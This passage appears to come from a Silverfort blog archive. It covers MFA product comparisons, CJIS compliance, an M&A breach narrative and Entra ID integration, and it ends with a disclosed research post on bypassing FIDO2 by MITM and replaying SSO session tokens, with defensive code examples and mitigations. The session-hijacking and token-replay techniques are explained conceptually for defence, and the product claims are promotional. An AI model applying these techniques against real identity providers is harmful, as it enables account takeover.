- Password Security: MFA mitigates risks associated with weak or reused passwords, adding a secondary barrier even if passwords are compromised.
- Flexibility and Adaptability: Adaptive MFA responds dynamically to risk factors such as user location and device type, enhancing security without impacting user experience.

## Key Features to Consider in an MFA Solution

With so many MFA tools available, focus on the following critical features to identify a solution that meets your organization’s unique security requirements.

### 1. Comprehensive Security

MFA should support a range of authentication factors, including biometric data, hardware tokens, one-time passwords (OTPs), and Single Sign-On (SSO). The ability to integrate seamlessly across both cloud and on-prem environments is crucial.

### 2. User-Friendly Experience

Complexity in MFA workflows can lead to skipped steps and increased security risks. Choose a solution that balances robust security with ease of use, such as offering quick and flexible login options, self-service password recovery, and minimal login friction.

### 3. Diverse Deployment Options

Look for MFA solutions that support both cloud and on-premises deployments to cover your entire infrastructure. Consider agent-based options, which are customizable but require software installation, or agentless MFA, which minimizes maintenance through cloud-based management.

### 4. Seamless Integration

An ideal MFA tool will integrate with your current IT stack, supporting applications, VPNs, directories, and any additional identification tools like password managers, providing consistent security coverage across your ecosystem.

### 5. Compliance Support

Compliance is critical for data protection. Opt for an MFA solution that helps meet industry standards like PCI DSS, ISO/IEC 27001, and HIPAA, which will allow you to monitor and document compliance efforts effectively.

## Top MFA Solutions for 2025

With these key features in mind, here are some of the top MFA solutions to consider as we head into 2025:

### 1. Silverfort

Silverfort’s agentless MFA technology is designed for modern enterprises, providing seamless, real-time protection for on-premises and cloud environments without endpoint agents. It is a versatile solution, compatible with legacy applications, operational technology (OT) systems, and command-line tools that traditional MFA solutions often cannot protect. Silverfort integrates with other major MFA providers (e.g., Microsoft, Ping, Duo) to elevate security across all resources, making it ideal for complex IT environments.

- Key Features: Identity Threat Detection and Response (ITDR), AI-driven and adaptive authentication, risk-based policies.
- Pros: Excellent compliance support, robust real-time monitoring and auditing, agentless deployment.
- Cons: Limited support for Linux workloads.

### 2. Cisco Duo

Cisco Duo provides a cloud-based MFA that supports passwordless access and single sign-on (SSO) for consistent, multi-layered security across all devices. Duo’s dedicated mobile app simplifies user authentication and offers clear visibility of device status and security threats, making it a strong choice for remote and hybrid work environments.

- Key Features: Passwordless login, risk-based authentication, SSO.
- Pros: Comprehensive device visibility, smooth integration with other tools, proactive phishing protection.
- Cons: On-premises performance can lag, limited email authentication options.

### 3. Ping Identity

Ping Identity offers an MFA solution built for hybrid and multi-cloud environments, enabling secure access across devices with single sign-on and robust user management features. While it provides extensive cloud deployment options, its interface can be complex, and it lacks clear documentation for compliance requirements.

- Key Features: Risk-based policies, MFA-enabled mobile app, support for remote access.
- Pros: Versatile cloud and on-premises support, passwordless options.
- Cons: Slow MFA notifications, complex user interface.

### 4. Okta Adaptive MFA

Okta Adaptive MFA is a flexible, cloud-based MFA solution within the larger Okta ecosystem, supporting a wide range of integrations and user profiles. The platform’s Quickstarts and SDKs enable simplified deployment, and it offers an intuitive, user-friendly experience with social login support and SSO capabilities.

- Key Features: Passwordless logins, Okta ThreatInsight, Okta FastPass.
- Pros: Strong phishing protection, user-friendly app, easy integration.
- Cons: Complex password management, high price point aimed at enterprise clients.

### 5. Microsoft Entra ID (formerly Azure AD)

Microsoft Entra ID offers a robust suite of MFA options, including SMS, app-based verification, and security keys. It integrates seamlessly with Microsoft 365 and numerous SaaS platforms, providing a cohesive security experience for organizations already in the Microsoft ecosystem.

- Key Features: SSO, biometrics, push notifications.
- Pros: User-friendly, supports identity management, extensive integration.
- Cons: Complex on-premises deployment, frequent Microsoft updates can disrupt performance.

### 6. WatchGuard AuthPoint

WatchGuard AuthPoint secures access with unique device DNA signatures, enhancing verification by identifying authorized devices and blocking unauthorized ones. The tool is ideal for cloud-based MFA and includes options for VPN protection, making it a good fit for mobile and remote users.

- Key Features: Device DNA, hardware tokens, mobile push.
- Pros: Reliable VPN protection, straightforward cloud deployment.
- Cons: Complex setup for on-premises deployments, notifications can be inconsistent.

### 7. RSA SecurID

RSA SecurID provides robust identity and access management solutions across enterprise and mid-sized businesses. Supporting multiple authentication types (biometrics, SMS, push notifications), RSA SecurID offers flexibility and risk-based policies, with integration options for third-party apps.

- Key Features: Identity assurance, time-based authentication, administrative control.
- Pros: User-friendly, strong VPN integration, clear setup.
- Cons: More complex for cloud use, lacks temporary code options for new devices.

## Overcoming Common MFA Challenges

Implementing MFA can come with certain challenges, including phishing risks, device loss, and compatibility issues. To mitigate these:

- Use Phishing-Resistant Methods: Consider hardware tokens and biometrics, which are less vulnerable to phishing.
- Encryption and Secure Channels: Protect communication with app-based authentication over encrypted channels.
- Adaptive Policies: Avoid authentication fatigue by using adaptive MFA, which adjusts the number of prompts based on risk.
- Prepare for Lost Devices: Support backup codes and remote management to help users quickly regain secure access if a device is lost.

## Choosing the Right MFA Solution for Your Organization

The ideal MFA solution will align with your organization’s size, security needs, budget, and anticipated growth. Choosing the right tool can streamline access management, secure data, and simplify compliance.

For organizations looking to elevate their security posture, Silverfort’s Unified Identity Protection offers unparalleled versatility, integrating effortlessly across cloud and on-premises environments while providing real-time identity threat protection.

See the difference with Silverfort: schedule a demo today!

---
- Published: 2024-05-23
- Modified: 2024-06-04
- URL: https://www.silverfort.com/blog/how-silverfort-helps-law-enforcement-comply-with-advanced-authentication/

If your organization has access to sensitive data from government agencies, you will most likely have to adhere to the Criminal Justice Information Services (CJIS) compliance requirements. CJIS compliance helps prevent unauthorized access to sensitive data, or Criminal Justice Information (CJI), and protects organizations from potential threats such as ransomware attacks and sanctions.
In this article, you will learn about the CJIS Security Policy and how Silverfort can help organizations comply with its identity security requirements, including the mandatory Advanced Authentication requirement of risk-based authentication and MFA.

## What is CJIS Compliance?

CJIS compliance is a set of minimum requirements for accessing and handling Criminal Justice Information (CJI), which is essentially any information that cannot be publicly disclosed except under certain circumstances, like by court order or when necessary for public safety. In particular, it refers to Federal Bureau of Investigation (FBI) data such as biometrics, biographics, case records, and other identifiable information about individuals, vehicles, or properties related to criminal activity.

CJIS compliance requirements include access control, identification and authentication, the adoption of advanced authentication measures such as MFA and risk-based authentication, incident response, visibility into all accounts, and auditing.

Contrary to what may be assumed, CJIS is not only relevant to law enforcement agencies, but to civil agencies as well. Specifically, state and local governments are increasingly becoming targets. First, attackers who gain access to state and local government networks could potentially infiltrate the FBI's networks using their CJIS credentials. And while it would probably be pretty challenging to shut down the entire FBI, the immediate threat is ransomware attacks, in which CJI data could be encrypted or even exposed.

The specific guidelines for protecting data that falls under the category of CJI are outlined in the FBI's CJIS Security Policy.

## Quick Overview of the CJIS Security Policy

The CJIS Security Policy defines the minimum security requirements for accessing and handling FBI criminal justice information throughout the entire CJI lifecycle, from creation to viewing, modification, transmission, dissemination, storage, and destruction. Currently, the CJIS Security Policy consists of 19 modules, or Policy Areas, each of which covers a different security aspect. This article will focus on the policy areas concerning identity security.

## The Identity Security Components of the CJIS Security Policy

### Policy Area 3: Incident Response (IR)

- IR Handling: Agencies are required to establish an operational incident response plan for managing, monitoring, documenting and reporting incidents. The plan should address every stage of the IR process, including preparation, training, detection, evidence collection, analysis, containment, eradication, and recovery.
- IR Assistance: Agencies should employ an IR assistance team that will provide expert advice and support in the handling, investigation, and reporting of incidents.

### Policy Area 4: Auditing and Accountability

Agencies should implement audit and accountability controls to ensure that users do not deviate from their authorized behavior patterns. Audit logs should be retained for a minimum of 365 days, and include authentication logs for both successful and unsuccessful access attempts to systems and resources, password changes, attempts to access or modify user/resource/directory permissions, and actions involving privileged accounts.

### Policy Area 5: Access Control

Integrate mechanisms to restrict access to CJI data, as well as to systems, applications, and services that provide access to CJI, including:

- Account Management: Maintain visibility into all accounts in your environment and perform annual validations.
- Access Enforcement: Assign and manage access privileges based on the least privileges necessary for each system, application or process to operate.
- Remote Access: Implement automated monitoring and access policies.

### Policy Area 6: Identification and Authentication

To gain access to systems, services, and resources, users must be identified and authenticated in accordance with the Advanced Authentication requirement. As outlined in Section 5.6.2.2 of the CJIS Security Policy, advanced authentication is mandatory and subject to audit as of October 1, 2024. Advanced authentication consists of:

- Multi-Factor Authentication (MFA): Requires the use of two or more different factors to authenticate successfully. The CJIS Security Policy breaks down authentication factors into the following categories: something you know (such as a personal identification number), something you have (such as an authenticator or token), and something you are (such as biometrics).
- Risk-based Authentication (RBA): Authentication requests are accepted based on the risk calculated by a combination of factors such as network information, user information, user profiling, request patterns, geolocation, browser metadata, IP addresses previously authenticated successfully, and other adaptive authentication techniques.

## Getting CJIS Compliant with Silverfort

### Policy Area 3: Incident Response (IR)

Silverfort provides full visibility into and continuous monitoring and risk analysis of all authentication and access attempts, including sources, destinations, risk levels, and more. In addition, you can apply access policies, either created by you or by Silverfort, to ensure that if an access attempt deviates from normal behavior, the policy will provide alerts and/or deny access. If you experience an incident, Silverfort is able to assist you in containing the compromised accounts, investigating, and recovering.

### Policy Area 4: Auditing and Accountability

In the Silverfort log screen you can view all authentication and access attempts, including those of user accounts, privileged accounts, and service accounts. You can filter by authentication type, account type, domain type, risk level, risk indicator, sources, destinations, protocols, time range, and more.
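The Policy Area 6 definitions above are easy to get wrong in practice: two factors from the same category (a password plus a PIN) are not MFA, and a risk-based policy has to weigh the signals the policy names before deciding whether to allow, step up, or deny. The following is an added illustration, not Silverfort's code; the factor-to-category mapping, signal weights, deny threshold, and sample user data are assumptions.

```python
"""Added example (not Silverfort's code): evaluating a login attempt against
the CJIS Advanced Authentication definitions in Policy Area 6 (Section 5.6.2.2).

MFA: two or more factors from DIFFERENT categories (know / have / are);
a password plus a PIN are both "something you know" and do not qualify.
RBA: risk is scored from signals the policy names (IP addresses previously
authenticated successfully, geolocation, browser metadata, request patterns).
Factor names, signal weights and thresholds are illustrative assumptions."""
from dataclasses import dataclass, field

# Assumed mapping from a presented factor type to its CJIS factor category.
FACTOR_CATEGORY = {
    "password": "know", "pin": "know",
    "totp": "have", "hardware_token": "have", "push": "have",
    "fingerprint": "are", "face": "are",
}
ALL_CATEGORIES = {"know", "have", "are"}
DENY_THRESHOLD = 70  # assumed: a score at or above this denies outright


@dataclass
class UserProfile:
    """What the system learned about a user from past successful logins."""
    known_ips: set = field(default_factory=set)          # IPs previously authenticated
    usual_countries: set = field(default_factory=set)    # geolocation baseline
    known_user_agents: set = field(default_factory=set)  # browser metadata baseline


@dataclass
class AuthRequest:
    user: str
    factors: list             # factor types presented, e.g. ["password", "totp"]
    source_ip: str
    country: str
    user_agent: str
    failed_attempts_last_hour: int = 0  # request-pattern signal


def factor_categories(factors):
    """Distinct CJIS categories covered by the presented factors."""
    return {FACTOR_CATEGORY[f] for f in factors if f in FACTOR_CATEGORY}


def satisfies_mfa(factors):
    """True only when at least two DIFFERENT categories are present."""
    return len(factor_categories(factors)) >= 2


def risk_score(req, profile):
    """Additive risk from the RBA signals; the weights are assumptions."""
    score = 0
    if req.source_ip not in profile.known_ips:
        score += 30  # IP never authenticated successfully before
    if req.country not in profile.usual_countries:
        score += 40  # unusual geolocation
    if req.user_agent not in profile.known_user_agents:
        score += 15  # unfamiliar browser metadata
    score += 10 * min(req.failed_attempts_last_hour, 5)  # repeated failures
    return score


def decide(req, profile):
    """Return (decision, detail) where decision is 'deny', 'step-up' or 'allow'."""
    score = risk_score(req, profile)
    if score >= DENY_THRESHOLD:
        return "deny", f"risk score {score} >= {DENY_THRESHOLD}"
    if satisfies_mfa(req.factors):
        return "allow", f"risk score {score}, MFA satisfied"
    # Step-up: ask for a factor from a category the user has not presented yet.
    missing = sorted(ALL_CATEGORIES - factor_categories(req.factors))
    return "step-up", f"risk score {score}, need a factor from: {', '.join(missing)}"


# Constructed sample profile (not real data).
ALICE = UserProfile(known_ips={"203.0.113.10"}, usual_countries={"US"},
                    known_user_agents={"Firefox/128"})

if __name__ == "__main__":
    for req in [
        AuthRequest("alice", ["password", "totp"], "203.0.113.10", "US", "Firefox/128"),
        AuthRequest("alice", ["password", "pin"], "203.0.113.10", "US", "Firefox/128"),
        AuthRequest("alice", ["password", "totp"], "198.51.100.7", "FR", "curl/8.0", 5),
    ]:
        print(req.factors, req.source_ip, "->", decide(req, ALICE))
```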
Policy Area 5: Access Control Access policies are configured based on users, groups, and organizational units (OUs), as well as the least privileges necessary for your systems, processes, and applications. With full visibility into user accounts, privileged accounts, and service accounts in your environment, you can create and monitor log files to detect malicious or irregular activity, as well as perform validations at any time or interval. Policy Area 6: Identification and Authentication Silverfort can enforce MFA on all access requests, including on-prem, remote, legacy applications and more, and for all users, from regular users to privileged users and admins. Access policies can be configured as static or risk-based. As opposed to static policies, which are applied regardless of authentication risk level, risk-based policies are applied according to risk levels and risk indicators, such as abnormal authentication, users with SPNs, old passwords, old operating systems, malicious IPs, and more. For more information on how Silverfort can help you comply with the CJIS identity security requirements, schedule a call with one of our experts or request a quote. --- - Published: 2024-05-22 - Modified: 2024-05-22 - URL: https://www.silverfort.com/blog/introducing-our-official-global-partner-program-and-celebrating-leslie-bois-amy-kowalchyk-who-made-crns-2024-women-of-the-channel-list/ We’re so excited to share that CRN®, a brand of The Channel Company, named Silverfort’s Leslie Bois, Vice President of Global Channel Sales, and Amy Kowalchyk, Director of the American Channel, to the Women of the Channel list for 2024. Since bringing Bois on board in early 2023 to lead global channel sales, Silverfort has become a 100% channel-first organization, creating all the foundational elements from rules of engagement, target partners, portals, onboarding, training, and services certifications. 
Today, we also officially unveiled the Global Partner Program to meet the growing demand for unified identity security. Our comprehensive Unified Partner Program enables global channel and cyber insurance partners to create the ultimate identity protection framework, allowing partners to enjoy seamless integration with other products in the partner’s portfolio and access comprehensive training and compliance support. This will deliver the 360-degree protection organizations need in their complex environments, while supporting Silverfort’s channel-first strategy.

We spent years researching and designing the identity security platform to enable modern identity security controls everywhere and eliminate the silos and blind spots that identity security suffers from. Silverfort, with the help of its partners, is hyper-focused on offering customers visibility and protection for all their identities, whether on-prem, in the cloud, human, or machine—including systems that no other solution can protect. Due to Silverfort’s customer-first mindset, partnering with organizations that have deep expertise in identity to protect customers together was the ideal strategy. Since the decision to make the company’s business 100% channel-based, revenues have grown rapidly—more than 100% year-over-year—with more than 90% of the revenues going through its channel program, and, in some regions, 100%.

Every year, CRN highlights women from vendor, distributor, and solution provider organizations whose vision and leadership benefit the technology industry. The CRN 2024 Women of the Channel honorees are creative, strategic leaders who are committed to using their skills to innovate and drive success for their partners and customers.

As Silverfort’s first North American channel hire, we’re excited to see Amy Kowalchyk recognized alongside Leslie. Amy is a strong advocate for the partners, Silverfort’s business, and her teammates. Since joining, she has spearheaded the execution of the company’s channel strategy in the region and doubled the pipeline and partner revenue year-over-year. At Silverfort, Leslie and Amy continue to build and execute a global channel strategy, allowing their partner community to expand their services offering and footprint in the emerging identity security space.

“It is a great privilege to honor the remarkable achievements of these women leaders in the IT channel,” said Jennifer Follett, VP of U.S. Content and Executive Editor, CRN at The Channel Company. “Each woman on the list has demonstrated a deep commitment to innovation and leadership that advances their organizations and drives transformation and success across the IT channel.”

The 2024 Women of the Channel list will be featured in the June issue of CRN Magazine and online at www.CRN.com/WOTC.

---

- Published: 2024-05-13
- Modified: 2024-05-13
- URL: https://www.silverfort.com/blog/identity-security-in-ma-gain-visibility-with-silverfort/

When a company intends to acquire another organization through a merger or purchase, it is important to know what security risks could accompany the acquisition. Without this knowledge, organizations could open themselves to significant financial and legal challenges.

Following an M&A, IT teams must merge different technologies and resources as the participating organizations become increasingly interconnected. A newly acquired environment brings its own IT systems, networks, and user accounts – along with its own unique risks – to an existing infrastructure. This can result in a highly complex environment where administrators may struggle to understand all the consolidated entity’s resources, applications, and users.

The new consolidated entity needs to be able to combine all domains and resources into a single unified IT infrastructure.
This means understanding the types of accounts and resources you need to migrate; for example, which accounts are service accounts and what kinds of applications you need to merge. In most cases, the IT team won’t know much about the acquired environment or its users.

This lack of visibility across the new environment, its resources and its users creates a major blind spot – and potentially many more security risks.

### Silverfort’s Domain Consolidation Protection

With Silverfort, organizations can quickly and easily migrate the new environment’s resources and users to the main entity domain, accelerating the post-merger integration process. Silverfort also offers organizations complete visibility of their existing and incoming environments, allowing them to protect both and pinpoint any risks associated with the integration. By enforcing new security measures with Silverfort, organizations can proactively defend against incoming cyber threats such as lateral movement attacks.

### Visibility and Monitoring of Service Accounts

Silverfort automatically identifies all service accounts and monitors their authentication and behavior within a consolidated environment. Silverfort can do this because machine and service accounts exhibit predictable behavior patterns, which allows automatic identification and categorization on the Service Accounts screen.

Silverfort also supports Group Managed Service Accounts (gMSA) and offers a filter that lets you see every gMSA in your system. Each gMSA is detected and treated like any other service account.

Screenshot #1: Silverfort’s Service Accounts screen displays the service account name, source, destination, number of authentications, risk score, baseline change and account info.

Silverfort identifies service accounts in several different ways:

- Behavioral Analysis – Silverfort tracks the account's behavior to identify repetitive traffic patterns.
- AD Configuration – Silverfort checks the account's attributes in AD to find characteristics common to service accounts.
- Naming Conventions – Silverfort holds a repository of naming conventions typically used for service accounts.
- Custom Insights – Silverfort receives feedback from the admin regarding the structure of service accounts in the customer environment (such as OU, SG, and naming conventions).
- gMSA – The different account types defined in AD are used as service accounts.

### Monitoring & Risk Analysis of Service Accounts

After all the migrated service accounts have been identified, you can monitor their activity and associated risks. Silverfort provides real-time insights and visibility into all service account details and behavior, while continuously monitoring and auditing their use. With continuous monitoring of all authentication and access activities of all migrated service accounts, Silverfort can assess the risk associated with every authentication attempt and detect any suspicious behavior or anomalies.

Screenshot #2: Silverfort’s investigation screen shows insights into a specific service account’s activity.

### Visibility of User Activity & Authentications

Using the Logs screen in the Silverfort console, organizations have complete visibility into all user logs and authentication activity. Organizations undergoing a merger gain a better understanding of the incoming users, what they are trying to access, and what their risk score is.

Screenshot #3: Silverfort’s authentication logs screen provides full visibility into all user logs, authentication activity, and risk indicators.

You can view details of a user's logs, authentication activity and risk indicators, and gain more actionable insights by clicking the “investigate” icon next to the user in the Logs screen. With these details, organizations are equipped with complete visibility into each user and their authentication activity.

Screenshot #4: Silverfort’s user investigation screen provides a detailed review of the authentication activities of a selected user, displaying their access requests in your environment.

As a result of having full visibility into migrated resources, service accounts, and users, organizations can rest assured that their consolidated environment is being protected and their overall identity security posture management is up to date.

### Authentication Firewall in Action: Preventing a Lateral Movement Attack Across Multiple Domains

The need for improved visibility and security controls across all domain entities during M&A was highlighted for one of Silverfort’s customers. In April 2024, a European manufacturer sought out our Identity Security Services to help with their threat-hunting capabilities, as they understood that one of the companies they had acquired had been compromised and subjected to a cyber attack.

As part of a larger acquisition, this customer had also acquired a smaller US-based entity, which they integrated into their organization. At the time, they created a two-way trust between their entities' domains to integrate the smaller domain into the newly consolidated organization. Unknown to the IT team, the acquired entity had limited security controls in place: it had no MFA protection for VPN access and no EDR on the endpoints. As a result, the acquired entity was compromised by malicious actors who attempted to move laterally from the smaller entity to the customer's domain to conduct a ransomware attack.

The Attack Flow:

- Initial access: Via VPN authentication, the attacker ran a brute-force attack against three different users on seven servers and successfully compromised them.
- Credential compromise: From this initial foothold and the compromise of the target users, the attacker changed their passwords and created new users with the same privileges.
- Lateral movement: With the compromised account, the attacker attempted to move laterally to the larger domain, which is a Silverfort customer. The larger domain started to see malicious access attempts against its domain and reached out to Silverfort for assistance.

The Protection Flow:

In Silverfort’s console, and working with the Silverfort threat-hunting team, the customer understood they were being attacked and quickly applied deny access policies to stop any access from the compromised entity's IP address.

The customer's security team segmented the entity's domain to ensure no malicious access could occur in their domain. This immediately blocked the lateral movement.

Following the implementation of an authentication firewall with deny policies and identity segmentation, the team used Silverfort to track the authentication trail of the compromised accounts back to the patient zero machine. They were then able to conclude remediation and remove the remaining malicious presence from the compromised domain.

This example shows how vital it is to have an identity protection solution that offers authentication firewall capabilities, including deny access enforcement policies and identity segmentation features. As a result of having real-time visibility and proactive security controls in place, the organization prevented an attack by threat actors who possessed compromised credentials.

Looking to gain complete visibility across your environment? Reach out to one of our experts here.

---

- Published: 2024-05-09
- Modified: 2024-05-09
- URL: https://www.silverfort.com/blog/silverfort-announces-new-integration-with-microsoft-entra-id-eam/

Silverfort is excited to announce our integration with external authentication methods (EAM) in Microsoft Entra ID, which is now in public preview. This allows customers to use Silverfort seamlessly with any app or service that relies on Entra ID as an identity provider.
### Enhanced MFA and Threat Intelligence

In today’s rapidly evolving digital landscape, securing user identities has never been more critical. Microsoft Entra ID EAM paired with Silverfort enhances organizations' identity posture without the complexity of managing multiple authenticators across the organization. This integration also introduces Silverfort threat intelligence into Entra ID cloud authentication flows, blocking bad actors from gaining access to applications residing in the cloud or on-prem.

### Key Benefits of Integration

Silverfort’s integration with Microsoft Entra ID EAM offers multiple benefits, including:

- Simplified User Experience: Users enjoy a smoother sign-in process with fewer disruptions, contributing to higher productivity and user satisfaction.
- Enhanced Security: By extending MFA to all resources in the cloud and on-premises, organizations can better protect against identity-based attacks.
- Unified Security Experience: Silverfort leverages authentication data from both on-prem and cloud applications, enhancing visibility into user behavior and effectively blocking potential breaches. This streamlined approach strengthens security across all platforms.

### How It Works

Integrating Silverfort with Microsoft Entra ID is simple. Organizations can add Silverfort as an external authentication method in the Entra ID admin center, enabling it across their apps and services with just a few clicks. To learn more, visit the Silverfort external authentication method documentation here: https://docs.silverfort.com/docs/silverfort-as-an-external-authentication-method-in-entra-id

Photo caption: External authentication methods are added from and listed in the authentication methods policies admin experience.

### Our Partnership in Action

Our work with Microsoft is not just about one-off solutions; it is about building a secure identity ecosystem for customers. Here are a few of the other ways we work together:

- Entra ID Bridge: This integration uses Entra ID SSO so that Entra can serve as the authentication mechanism for on-prem resources, bridging the gap between cloud-based identity management and local enterprise environments.
- Entra ID Sign-In Logs: This integration gives Silverfort visibility into cloud authentication traffic, enhancing the Silverfort Risk Estimation for users, which provides a more accurate risk estimation based on user activity both in Azure and on-prem.
- Active Directory Integration: By integrating with Microsoft Active Directory, Silverfort ensures seamless identity management and security protocols across on-premises systems, including those traditionally difficult to protect, without the need to deploy an agent.
- ADFS Integration: Our integration with Microsoft Active Directory Federation Services (ADFS) allows for robust federation capabilities, meaning any app or service protected by ADFS can leverage Silverfort MFA and intelligence.
- Replacement of Entra ID Custom Controls with EAM: Silverfort supports the transition from Entra ID's custom controls to the new external authentication methods (EAM), enhancing the flexibility and management of authentication methods across Entra ID services.

Silverfort's integration with Microsoft Entra ID EAM represents a significant advancement in identity security. By simplifying and strengthening the authentication process, this integration not only improves security but also enhances the user experience across multiple platforms. As digital threats grow increasingly sophisticated, integrating Microsoft Entra with Silverfort via EAM allows organizations to stay a step ahead in protecting their critical assets. We are excited to deepen our partnership with Microsoft and look forward to sharing more about the additional integrations we are building soon!
---

- Published: 2024-05-06
- Modified: 2024-11-19
- URL: https://www.silverfort.com/blog/using-mitm-to-bypass-fido2/

FIDO2 is the umbrella term for a set of modern passwordless authentication standards. The Fast Identity Online (FIDO) Alliance developed it to replace legacy passwords and provide a secure method of authenticating with a physical or embedded key. FIDO2 is best known for protecting people from man-in-the-middle (MITM), phishing and session hijacking attacks. In this article, I’ll take you through my research into how MITM attacks can be used to bypass FIDO2. First, I will outline a complete WebAuthn authentication flow, then walk through the protections of FIDO2. Then I will cover well-known attack techniques and provide real-life use cases. Lastly, I will discuss mitigations and what you can do to protect your enterprise.

### But first, some background

The FIDO2 authentication flow consists of the WebAuthn API specification for communication between the client and the relying party (RP), which is the cloud application, and the Client to Authenticator Protocol (CTAP) for communication with the hardware. The entire process is managed by the browser and consists of two steps: device registration and authentication. It is constructed this way because FIDO2 is based on public key cryptography: the client generates a private and public key pair and sends the public key to the RP, which uses it to verify signatures upon sign-in. FIDO can be applied as an authentication method for a single application or in a federation. For those who don’t know, a federation refers to single sign-on (SSO) for multiple unrelated applications managed by a single identity provider (IdP).

### FIDO2 security features

FIDO2 is famous for its security features, mainly for preventing phishing, man-in-the-middle and session hijacking attacks. As part of my research, I wanted to see whether FIDO2 is immune to these attacks, and I was surprised by the results.

I started with session hijacking, an attack technique where the adversary steals a browser’s session to gain access to the user's application and private data. The second attack I investigated was a man-in-the-middle (MITM) attack on the IdP, where an adversary eavesdrops on, modifies and relays communications between two devices that believe they are talking directly to each other. Today, MITM is more difficult to accomplish thanks to TLS protection. Even so, there are many methods to achieve a MITM position, including DNS/DHCP spoofing, ARP poisoning and SLAAC. In addition, state actors have been known to overcome and decrypt TLS by stealing an organization’s certificate, for example by attacking Active Directory Certificate Services.

FIDO was designed to prevent these attacks. However, when implementing this modern authentication method, most applications do not protect the session tokens created after authentication succeeds. I discovered that many identity providers are still vulnerable to MITM and session hijacking. To understand how this works, we need to go back to basics.

Over time, the basics of web communication have hardly changed. The HTTP protocol and its features are used broadly across the World Wide Web, including GET and POST to transfer attributes between endpoints and cookies to keep session state for a client. Web applications and SSO protocols such as OIDC and SAML rely on HTTP and must follow its conventions to keep client state. Over the years, the security of user sessions has improved, both in how the browser stores them locally and in how the application computes them. However, these changes are not enough.

### How exactly does FIDO2 protect you?

For a successful FIDO2 authentication, the user must first register the FIDO device with the relying party, which has the browser call `navigator.credentials.create()`. This instructs the FIDO device to generate a private and public key for a specific user and bind it to a domain origin. The browser can then validate the domain origin of the relying party during the authentication process.

Next is the authentication step, where the relying party calls the browser’s `navigator.credentials.get()` for each authentication request. Once triggered by the RP, the browser communicates with the FIDO security key through CTAP. If the end user approves the authentication, the security key generates a signature using the stored private key. This signature is later verified by the RP using the corresponding public key.

In a phishing attack on a website with a different URL, the origin check prevents credential theft because the URL doesn’t match the registered origin. The MITM attack mechanism, however, is different. The prerequisite for a MITM attack is a certificate trusted by the target victim, since modern browsers alert on untrusted certificates and force authentication over TLS to the remote website. A successful MITM exposes the entire request and response content of the authentication process. When it ends, the adversary can acquire the generated state cookie and hijack the victim's session. Put simply, there is no validation by the application after the authentication ends.

### Test use cases

I decided to take Entra ID, PingFederate and Yubico as research use cases. Each operates differently and has its own pros and cons.

#### Use case 1: Yubico Playground

The Yubico Playground was created to demonstrate and test FIDO security features and keys. In this example, FIDO authenticates the user directly over HTTP against a local user database. Upon successful authentication, a cookie named "session" is generated. There is no validation of the device that requested this session, and any device can use this cookie until it expires. Acquiring this cookie could allow the adversary to bypass the authentication step, reach the user’s private area and, in this case, remove the security key from the user’s profile. This is a simple example of session hijacking; as we move to more complicated scenarios, we will see how this method shifts.

#### Use case 2: Entra ID SSO

The second use case is Entra ID SSO, which can authenticate over various SSO protocols and other modern authentication methods. Its Conditional Access authentication strength feature can limit authentication to passwordless mechanisms, specifically FIDO2. Our test validated native Microsoft applications such as Office 365 and the Azure Management portal over the OpenID Connect (OIDC) protocol, and an example third-party application over the SAML protocol. In both federation protocols, the IdP provides a signed access token with an expiration time of 1 hour that is passed as a POST attribute to the relying party.

In the federation mechanism, the adversary doesn’t even have to relay the authentication process. The attacker just needs a signed token, which can be reused within the right time frame to generate state cookies that are valid for a longer time frame. OIDC supports refresh tokens, which can generate session tokens for an extended period. We can see in the following example that the native Azure Management portal application does not validate the token granted by the SSO.

#### Use case 3: PingFederate

The third use case is PingFederate. This umbrella application provides federated SSO for a large variety of enterprise applications. Unlike Entra, Ping uses third-party adapters to perform authentication. These adapters can be chained into an authentication policy flow. Each adapter has its own context and is separated from the others. Authentication succeeds when a user meets the requirements of all the adapters in the policy. FIDO2 capabilities can be used with the PingOne adapter. Surprisingly, our team discovered that if the relying party developer doesn’t validate the OIDC token (or SAML Response), the outlined MITM attack succeeds.

### Authentication weakest link

The SSO use cases are more severe than the direct approach. As more players are involved in the authentication process, the relying party has less control over validating the integrity of the source device. Even though FIDO protects against MITM attacks, the whole chain relies on its weakest links, which are the SSO protocols, whose granted tokens can be reused by a different device.

### Mitigations and next thoughts

What if there were a way to verify that the authenticated session is used solely by the authenticated client? Introducing Token Binding, a proposed standard from 2018.

Token Binding allows applications and services to cryptographically bind their security tokens to the TLS layer to mitigate token theft and MITM attacks. Token Binding v1.0 binds the entire session to its underlying TLS handshake. The public key cryptography extends beyond the authentication context, and WebAuthn can securely deliver the token binding signature.

But how does Token Binding work? During the Client/Server Hello, a Token Binding extension is negotiated. The two endpoints agree on the TLS fields that the client will sign. Exactly as in WebAuthn, the browser creates a long-lived private/public key pair. The client sends the public key to the RP for signature verification; the signature itself is then sent over the application layer. The server verifies the signature and binds it to the session token.

I initially conducted this research in mid-2023 and submitted the findings to Microsoft. In response to the initial disclosure, Microsoft stated that this is not a vulnerability. Even so, it is an attack surface that could cause damage to an exposed organization. Four months later, Microsoft presented a Conditional Access preview of Token Protection, which is a variant of token binding specifically for the Trusted Platform Module (TPM). In its documentation Microsoft explains that token theft is rare, but the damage from it can be significant. In the case of web applications, the TPM may act similarly to FIDO, using a different communication method to the security chip; the WebAuthn protocol stays the same for browser and RP communication. The current preview is limited to specific web applications and Windows client versions. The current configuration is cumbersome, and in the future Microsoft will expand the feature to generic FIDO security keys.

To date, Microsoft Edge is the only browser that offers Token Binding. Chrome offered Token Binding but removed it due to low adoption. The Token Binding proposal discusses two types of device binding. The first, Provided Token Binding, is for direct authentication; this type is common in simple applications like the Yubico Playground. The second, Referred Token Binding, covers the protection of both the identity provider and the relying party. In either case, WebAuthn may pass the Token Binding signature securely during the authentication phase. Application managers are advised to require Token Binding on FIDO2 authentication, where available. When designing an authentication mechanism, you need to understand your threat model and build your authentication accordingly. In sensitive cases, the direct approach is recommended, as the application has more control over the session token.

For application developers, we recommend adding token binding to the FIDO2 authentication process if possible, or at least limiting the OIDC token or SAML response of each successful authentication to a single use. It is concerning that the great security features of FIDO2 do not protect the entire user session.
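The gap the post describes, as an added example (not Silverfort's code or the Token Binding specification): a correct WebAuthn origin check on clientDataJSON stops the look-alike phishing origin, yet the bearer session cookie minted afterwards is accepted from any device; binding the cookie MAC to a per-client channel identifier (a simplified model of the Token Binding idea, with `channel_id` standing in for the TLS-layer key) and consuming each federation assertion only once closes it. All origins, keys, identifiers and lifetimes are constructed for the demo.

```python
"""Added example: WebAuthn origin check vs. an unbound session, and two
mitigations (channel-bound session cookie, one-time use of the SSO assertion).
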